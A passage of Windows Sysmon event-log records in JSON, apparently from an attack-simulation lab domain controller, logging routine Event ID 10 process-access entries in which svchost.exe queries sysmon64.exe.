07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5475,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5476,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5477,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5478,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5479,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5480,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5481,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5482,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 